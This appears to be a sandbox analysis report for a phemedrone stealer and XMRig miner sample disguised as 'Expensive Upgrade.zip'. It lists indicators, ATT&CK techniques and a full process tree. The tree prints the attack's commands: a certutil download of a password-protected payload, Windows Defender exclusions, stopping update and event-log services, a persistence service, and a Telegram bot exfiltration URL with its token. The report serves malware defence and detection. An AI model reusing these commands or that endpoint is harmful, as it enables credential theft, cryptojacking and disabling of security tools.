phemedrone | bf1952d0696cc5a413ce81f6683a456a5654c86cf152fed2b80b8c48aa18f77a

Analysis

max time kernel
64s
max time network
76s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
11-07-2024 12:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Expensive Upgrade.zip
Size

481.6MB
MD5

09e30ba3880d83e9102a455836e91202
SHA1

d9484f6dc912e8ff8b551b4b8f419d5e82fd989f
SHA256

bf1952d0696cc5a413ce81f6683a456a5654c86cf152fed2b80b8c48aa18f77a
SHA512

20c776f06a9f9e775a86546dcdce7e36d14d83fbe5aa7d2660e0c155b2fbafa1b3fd08755af0dc5feda27fc7108125196eae11facdcb2a68f6587643fd1f16a2
SSDEEP

12582912:Kvyz22qQ/BMwgxftz5pEaiFT8r7m47OaQTm663zcv0pnPWKqMln3e:c4v/iLVzLNiV47m47p663gv0ZqIu

Score

10^/10

phemedrone xmrig evasion execution miner persistence spyware stealer upx

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot7210033498:AAF37dG_macADJaVmLif8kSUvA5P0Qqzenw/sendDocument

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/4000-322-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4000-329-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4000-328-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4000-327-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4000-326-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4000-325-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4000-323-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

64 powershell.exe
4568 powershell.exe
2440 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Drops file in Drivers directory 2 IoCs

Processes:

regedit.exeinstaller.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts regedit.exe
File created C:\Windows\system32\drivers\etc\hosts installer.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 3 IoCs

Processes:

installer.exedrivers.exeregedit.exe

pid process

784 installer.exe
4412 drivers.exe
3032 regedit.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
64	powershell.exe
4568	powershell.exe
2440	powershell.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	regedit.exe
File created	C:\Windows\system32\drivers\etc\hosts	installer.exe

pid	process
784	installer.exe
4412	drivers.exe
3032	regedit.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/4000-317-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-321-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-322-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-320-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-329-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-328-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-327-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-326-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-325-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-319-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-323-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4000-318-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

50 pastebin.com
51 pastebin.com
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

1720 powercfg.exe
4496 powercfg.exe
5088 powercfg.exe
896 powercfg.exe
1740 powercfg.exe
4684 powercfg.exe
4392 powercfg.exe
2728 powercfg.exe

flow	ioc
50	pastebin.com
51	pastebin.com

pid	process
1720	powercfg.exe
4496	powercfg.exe
5088	powercfg.exe
896	powercfg.exe
1740	powercfg.exe
4684	powercfg.exe
4392	powercfg.exe
2728	powercfg.exe

Drops file in System32 directory 4 IoCs

Processes:

regedit.exeinstaller.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	regedit.exe
File opened for modification	C:\Windows\system32\MRT.exe	installer.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

drivers.exeregedit.exe

description	pid	process	target process
PID 4412 set thread context of 1756	4412	drivers.exe	RegAsm.exe
PID 3032 set thread context of 2428	3032	regedit.exe	conhost.exe
PID 3032 set thread context of 4000	3032	regedit.exe	svchost.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
5076	sc.exe
4000	sc.exe
4192	sc.exe
4068	sc.exe
3552	sc.exe
2688	sc.exe
4320	sc.exe
2276	sc.exe
3348	sc.exe
1980	sc.exe
1492	sc.exe
1584	sc.exe
4300	sc.exe
1088	sc.exe

Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

2672 timeout.exe
3884 timeout.exe
1584 timeout.exe
4708 timeout.exe

pid	process
2672	timeout.exe
3884	timeout.exe
1584	timeout.exe
4708	timeout.exe

Modifies data under HKEY_USERS 50 IoCs

Processes:

powershell.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	svchost.exe

Runs regedit.exe 1 IoCs

Processes:

regedit.exe

pid process

3032 regedit.exe

pid	process
3032	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeRegAsm.exeinstaller.exepowershell.exeregedit.exepowershell.exesvchost.exe

pid	process
2440	powershell.exe
2440	powershell.exe
1756	RegAsm.exe
1756	RegAsm.exe
784	installer.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
784	installer.exe
3032	regedit.exe
4568	powershell.exe
4568	powershell.exe
4568	powershell.exe
3032	regedit.exe
3032	regedit.exe
3032	regedit.exe
3032	regedit.exe
3032	regedit.exe
3032	regedit.exe
3032	regedit.exe
3032	regedit.exe
3032	regedit.exe
3032	regedit.exe
3032	regedit.exe
3032	regedit.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe
4000	svchost.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

powershell.exeRegAsm.exepowershell.exeinstaller.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exeregedit.exesvchost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	1756	RegAsm.exe
Token: SeDebugPrivilege	64	powershell.exe
Token: SeDebugPrivilege	784	installer.exe
Token: SeShutdownPrivilege	4392	powercfg.exe
Token: SeCreatePagefilePrivilege	4392	powercfg.exe
Token: SeShutdownPrivilege	4496	powercfg.exe
Token: SeCreatePagefilePrivilege	4496	powercfg.exe
Token: SeShutdownPrivilege	1720	powercfg.exe
Token: SeCreatePagefilePrivilege	1720	powercfg.exe
Token: SeShutdownPrivilege	2728	powercfg.exe
Token: SeCreatePagefilePrivilege	2728	powercfg.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	3032	regedit.exe
Token: SeLockMemoryPrivilege	4000	svchost.exe
Token: SeShutdownPrivilege	4684	powercfg.exe
Token: SeCreatePagefilePrivilege	4684	powercfg.exe
Token: SeShutdownPrivilege	5088	powercfg.exe
Token: SeCreatePagefilePrivilege	5088	powercfg.exe
Token: SeShutdownPrivilege	1740	powercfg.exe
Token: SeCreatePagefilePrivilege	1740	powercfg.exe
Token: SeShutdownPrivilege	896	powercfg.exe
Token: SeCreatePagefilePrivilege	896	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exedrivers.exe

description	pid	process	target process
PID 3744 wrote to memory of 3520	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 3520	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4972	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4972	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4364	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4364	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4368	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4368	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4908	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4908	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 1568	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 1568	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4064	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4064	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4820	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4820	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 5004	3744	cmd.exe	chcp.com
PID 3744 wrote to memory of 5004	3744	cmd.exe	chcp.com
PID 3744 wrote to memory of 2280	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 2280	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 2672	3744	cmd.exe	timeout.exe
PID 3744 wrote to memory of 2672	3744	cmd.exe	timeout.exe
PID 3744 wrote to memory of 3272	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 3272	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 2808	3744	cmd.exe	forfiles.exe
PID 3744 wrote to memory of 2808	3744	cmd.exe	forfiles.exe
PID 3744 wrote to memory of 4384	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4384	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 4564	3744	cmd.exe	chcp.com
PID 3744 wrote to memory of 4564	3744	cmd.exe	chcp.com
PID 3744 wrote to memory of 4392	3744	cmd.exe	doskey.exe
PID 3744 wrote to memory of 4392	3744	cmd.exe	doskey.exe
PID 3744 wrote to memory of 3640	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 3640	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 2440	3744	cmd.exe	powershell.exe
PID 3744 wrote to memory of 2440	3744	cmd.exe	powershell.exe
PID 3744 wrote to memory of 3248	3744	cmd.exe	certutil.exe
PID 3744 wrote to memory of 3248	3744	cmd.exe	certutil.exe
PID 3744 wrote to memory of 4064	3744	cmd.exe	doskey.exe
PID 3744 wrote to memory of 4064	3744	cmd.exe	doskey.exe
PID 3744 wrote to memory of 424	3744	cmd.exe	UnRAR.exe
PID 3744 wrote to memory of 424	3744	cmd.exe	UnRAR.exe
PID 3744 wrote to memory of 784	3744	cmd.exe	installer.exe
PID 3744 wrote to memory of 784	3744	cmd.exe	installer.exe
PID 3744 wrote to memory of 4412	3744	cmd.exe	drivers.exe
PID 3744 wrote to memory of 4412	3744	cmd.exe	drivers.exe
PID 3744 wrote to memory of 4412	3744	cmd.exe	drivers.exe
PID 3744 wrote to memory of 5004	3744	cmd.exe	doskey.exe
PID 3744 wrote to memory of 5004	3744	cmd.exe	doskey.exe
PID 3744 wrote to memory of 3884	3744	cmd.exe	timeout.exe
PID 3744 wrote to memory of 3884	3744	cmd.exe	timeout.exe
PID 3744 wrote to memory of 788	3744	cmd.exe	findstr.exe
PID 3744 wrote to memory of 788	3744	cmd.exe	findstr.exe
PID 4412 wrote to memory of 1756	4412	drivers.exe	RegAsm.exe
PID 4412 wrote to memory of 1756	4412	drivers.exe	RegAsm.exe
PID 4412 wrote to memory of 1756	4412	drivers.exe	RegAsm.exe
PID 4412 wrote to memory of 1756	4412	drivers.exe	RegAsm.exe
PID 4412 wrote to memory of 1756	4412	drivers.exe	RegAsm.exe
PID 4412 wrote to memory of 1756	4412	drivers.exe	RegAsm.exe
PID 4412 wrote to memory of 1756	4412	drivers.exe	RegAsm.exe
PID 4412 wrote to memory of 1756	4412	drivers.exe	RegAsm.exe
PID 3744 wrote to memory of 1180	3744	cmd.exe	wscript.exe
PID 3744 wrote to memory of 1180	3744	cmd.exe	wscript.exe
PID 3744 wrote to memory of 4688	3744	cmd.exe	findstr.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Expensive Upgrade.zip"
1⤵
PID:3888

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\expensive_upgrade\start.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3744
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:3520
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:4972
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:4364
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:4368
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:4908
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:1568
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:4064
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:4820
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:5004
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:2280
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:2672
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:3272
- C:\Windows\system32\forfiles.exe
  forfiles /p C:\Users\Admin\Desktop\expensive_upgrade /m STEALER.exe /c 'cmd /c start @file'
  2⤵
  PID:2808
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:4384
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:4564
- C:\Windows\system32\doskey.exe
  doskey FINDSTR=CHDIR
  2⤵
  PID:4392
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:3640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "if ('C:\Users\Admin\Desktop\expensive_upgrade' -like '*temp*') { exit 1 } else { exit 0 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2440
- C:\Windows\system32\certutil.exe
  certutil -urlcache -split -f "https://drive.usercontent.google.com/u/0/uc?id=1cOfdrYTcndJEY8uHrMnDtqUbkax07UMo&export=download" "C:\Users\Admin\AppData\Local\Temp\support.rar"
  2⤵
  PID:3248
- C:\Windows\system32\doskey.exe
  doskey ATTRIB=FC
  2⤵
  PID:4064
- C:\Users\Admin\Desktop\expensive_upgrade\rar\UnRAR.exe
  "C:\Users\Admin\Desktop\expensive_upgrade\rar\unrar.exe" x -p34nbGjnngjGn484ngn4nGng34GDG -o+ "C:\Users\Admin\AppData\Local\Temp\support.rar" "C:\Users\Admin\AppData\Local\Temp\Rar$DvD1329235f7rartemp"
  2⤵
  PID:424
- C:\Users\Admin\AppData\Local\Temp\Rar$DvD1329235f7rartemp\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\Rar$DvD1329235f7rartemp\installer.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:784
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4824
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4668
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1584
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3348
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1980
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:4300
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:5076
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4392
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4496
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1720
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "system32"
    3⤵
    - Launches sc.exe
    PID:4000
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "system32" binpath= "C:\ProgramData\windows\regedit.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1088
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4192
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "system32"
    3⤵
    - Launches sc.exe
    PID:3552
- C:\Users\Admin\AppData\Local\Temp\Rar$DvD1329235f7rartemp\drivers.exe
  "C:\Users\Admin\AppData\Local\Temp\Rar$DvD1329235f7rartemp\drivers.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4412
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1756
- C:\Windows\system32\doskey.exe
  doskey CMD=BITSADMIN
  2⤵
  PID:5004
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:3884
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:788
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\Users\Admin\AppData\Local\Temp\Colos.vbs" //B
  2⤵
  PID:1180
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:4688
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:4168
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:4956
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:5088
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:1608
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:448
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\expensive_upgrade\start.bat"
  2⤵
  PID:2736
- C:\Windows\system32\forfiles.exe
  forfiles /p C:\Users\Admin\Desktop\expensive_upgrade /m STEALER.exe /c 'cmd /c start @file'
  2⤵
  PID:3168
- C:\Windows\system32\doskey.exe
  doskey /listsize=0
  2⤵
  PID:1040
- C:\Windows\system32\timeout.exe
  timeout /T 10 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:1584
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:4708

C:\ProgramData\windows\regedit.exe
C:\ProgramData\windows\regedit.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
